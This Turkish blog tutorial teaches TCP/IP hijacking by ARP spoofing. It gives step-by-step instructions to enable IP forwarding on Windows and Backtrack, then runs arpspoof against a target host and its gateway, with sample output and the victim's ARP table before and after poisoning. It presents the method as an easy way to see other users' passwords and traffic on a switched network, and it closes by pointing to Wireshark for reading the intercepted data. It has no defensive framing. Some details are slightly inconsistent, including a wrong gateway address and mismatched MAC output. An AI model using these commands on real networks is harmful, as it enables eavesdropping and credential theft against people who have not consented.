TCP/IP Hijacking

TCP/IP hijack çok basit ve güçlü bir atak yöntemidir. Bu yöntemi kullanarak switch ile kurulmuş bir ağda bulunan  herhangi bir bilgisayar için şifreleri ya da herhangi başka veri alışverişlerini görmek çok kolaydır. Hele birde ağınızda HUB kullanılıyorsa, bu işlem çok daha kolay olacaktır, çünkü ağda yer alan bir bilgisayardan HUB a gönderilen bir paket HUB’ ın tüm portlarına iletilir. Peki ağınız switch yardımıyla kurulmuşsa? Switchler HUB lara göre daha daha kullanışlıdır(akıllıdırlar). Switche bir paket geldiğinde, statik ve dinamik olarak belirlenen mac adresi ve IP ilişkilendirme tablosundan yararlanılır ve paketler ona göre gönderilir. Bu yüzden switchli ağların dinlenmesi işlemi biraz daha zordur.
 

TCP/IP Hijacking Nedir?

 
Bu yöntem kısaca kendi bilgisayarınızı ya da cihazınızı ağdaki diğer bir cihazın yerine geçmiş gibi kullanılmanızdır. Bu işlem mantık olarak MAC – IP tablolarını değiştirmeye yöneliktir. Kablolu ağlarda bu yöntem spoofing olarakta bilinir. Bu yöntemi; olmadığınız biri gibi görünmek olarak da ifade edebiliriz.

 

Yöntemin en genel ve kullanılan türü ARP (Adres çözümleme protokolü -address resolution protocol) spoofing dir.Ethernet ağlarındaki her bilgisayar tekil(benzersiz) bir IP adresi kullanır. Aynı zamanda her bilgisayarın bir de MAC (media access control) adresi vardır. Ağdaki her bilgisayar, ağda yer alan diğer cihazların IP adresi ve MAC adreslerini tuttuğu ARP tablosu denilen verileri saklar.  Bu yöntemimizle ağda yer alan bir cihazın ARP tablosundaki verileri isteğimiz doğrultusunda değiştireceğiz.

  

ARP Spoofing Örneği

Neler gerekiyor

Senaryomuz gereği sadeceBacktrackile işlerimizi kolayca halledebiliriz. Ancak bununla uğraştırma beni windows altında yapmak istiyorum diyorsanız; bunun için önce arpspoof un windows sürümünü indirmeniz gerekiyor. Virüs programları buna exploits, downloader vs. gibi uyarılar verebilir, kullanıp kullanmamak size kalmış.

 

Gerekli yazılımları temin ettiğinizi düşünerek önce Windows için arp spoof ayarlarını yapalım.

Yapılması gereken tek bir ayar var oda, ip forwarding yani TCP/IP paketlerinin yönlendirilmesi işlemi. Windows altında bu özellik varsayılan olarak kapalı geliyor.

Windows işletim sistemlerinde TCP/IP yönlendirme/iletimini (ip_forwarding) yapmak için. (Windows 7 ve Windows XP için doğrulanmıştır, diğer windows işletim sistemlerinde de muhtemelen aynı şekilde olacaktır. Mesela Vista kullanıyorsanız ve burada yer alan ipenablerouter anahtarı yoksa kendiniz oluşturabilirsiniz ya da varsa değerini değiştirebilirsiniz. Tipi: Dword (32bit) olmalı)

  1. 1. Kayıt Defteri Düzenleyicisi'ni (regedit.exe) başlatın.

    2. Kayıt Defteri Düzenleyicisi'nde, aşağıdaki kayıt defteri anahtarını bulun:

    Hkey_local_machınesystemcurrentcontrolsetservicestcpipparameters

    3. Aşağıdaki değeri ayarlayın:

    Değer adı : ipenablerouter
    Değeri türü: REG_DWORD
    Değer verileri: 1

    4.regedit.exe yi kapatın

 

Bu işlemi Backtrack altında yapmak için 

bt ~ # echo 1 > /proc/sys/net/ipv4/ip_forward

komutunu yazmanız yeterli olur.

 

Uygulama Zamanı

Herşeyin hazır olduğunu varsayarak uygulamaya başlayalım:

Hedef IP Adresi: 192.168.1.66
Ağ Geçidi IP Adresi: 192.168.1.1
MAC Adresim: 00:11:C3:C7:A9:1D

Hedef makinede komut satırını açıp ARP tablosunun işleme başlamadan önceki haline bakalım:

    C:Documents and Settingsharun>arp -a
    Interface: 192.168.1.66 — 0x3
      Internet Address      Physical Address      Type
      192.168.1.1           00-30-1d-bc-23-a8     dynamic
      192.168.1.2           00-30-14-23-a7-aa     dynamic
      192.168.1.220         00-30-14-74-32-aa     dynamic

Buradan ağ geçidinin MAC adresinin 00:30:1d:bc:23:a8 olduğunu görüyoruz. Şimdi arpspoof komutunu çalıştıralım, hem linux hemde windows için aynı şekildedir.

    bt ~ # arpspoof -t 192.168.1.66 192.168.1.1
    0:11:c3:c7:a9:1d 0:11:66:a1:2c:3b 0806 42: arp reply 192.168.1.1 is-at 0:30:1d:bc:23:a8
    0:11:c3:c7:a9:1d 0:11:66:a1:2c:3b 0806 42: arp reply 192.168.1.1 is-at 0:30:1d:bc:23:a8
    0:11:c3:c7:a9:1d 0:11:66:a1:2c:3b 0806 42: arp reply 192.168.1.1 is-at 0:30:1d:bc:23:a8

Bu komut ile hedefimiz olan 192.168.1.66 nolu IP ye ağ geçidi olan 192.168.5.1 in MAC adresinin benimki olduğunu yani 00:11:c3:c7:a9:1d olduğunu söylüyoruz.

Şimdi komutu ters çeviriyoruz.

    bt ~ # arpspoof -t 192.168.1.1 192.168.1.66
    0:11:c3:c7:a9:1d 0:50:8b:cc:43:48 0806 42: arp reply 192.168.1.66 is-at 0:11:c3:c7:a9:1d
    0:11:c3:c7:a9:1d 0:50:8b:cc:43:48 0806 42: arp reply 192.168.1.66 is-at 0:11:c3:c7:a9:1d

Bu komut ise 192.168.1.1 IP li ağ geçidine; 192.168.1.66 IP numaralı hedefimizin MAC adresinin benimki olduğunu söylüyoruz

Bu işlemlerden sonra hedef cihazda ARP tablosuna baktığımızda:

    C:Documents and Settingsharun>arp -a
    Interface: 192.168.1.66 — 0x3
      Internet Address      Physical Address      Type
      192.168.1.1           00-11-c3-c7-a9-1d     dynamic
      192.168.1.2           00-30-14-23-a7-aa     dynamic
      192.168.1.16          00-16-d4-c7-b9-cd     dynamic
      192.168.1.71          00-11-0a-f8-ef-db     dynamic
      192.168.1.220         00-30-14-74-32-aa     dynamic

Yaptığımız işlemin başarılı olduğunu görüyoruz. Artık hedef cihaz, ağ geçidi olarak bizim makinemizi görüyor. Bundan sonra hedef cihaz ağdan yapacağı her türlü iletişimi bizim makinemiz üzerinden gerçekleştirecektir.

Hedefimizin ağ ortamı ile yaptığı veri alışverişlerini görmek için wiresharkkullanabilirsiniz. Bu verilerin içerisinde neler olabileceğinin yorumunu sizlere bırakıyorum. 

 

harun Hakkında

Matematikçi...Bilgisayar Yüksek Mühendisi... Bir zamanlar Adli Bilişim uzmanı...

İlginizi Çekebilir

Port Tarama

Bu makalede port taramanın ne olduğuna değinip, farklı port tarama yöntemleri ve güvenlik açıklarını nasıl …

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir